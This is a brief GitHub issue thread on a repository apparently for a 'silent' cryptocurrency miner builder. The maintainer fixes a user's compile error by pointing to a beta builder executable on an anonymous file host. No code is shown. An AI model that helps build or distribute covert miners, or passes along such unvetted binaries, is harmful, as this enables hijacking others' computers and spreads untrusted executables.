### ISSUE TITLE
Compiling error :  cc1plus.exe: out of memory allocating 2147487743 bytes

### ISSUE THREAD

**Issue by anesd2** [UnamSanctam/SilentCryptoMiner#1241]
Need help
![monerominer](https://user-images.githubusercontent.com/116741745/198179801-215450a9-78af-4b55-9d5e-cdd9789435ef.PNG)

**Comment by UnamSanctam** [comment]
Are you trying to mine Ravencoin (xmrig "GPU Mining")? If so then you can use the beta build: https://anonfiles.com/hdNbS977y9/Silent_Crypto_Miner_Builder_exe.

**Comment by anesd2** [comment]
thanks bro now it's working
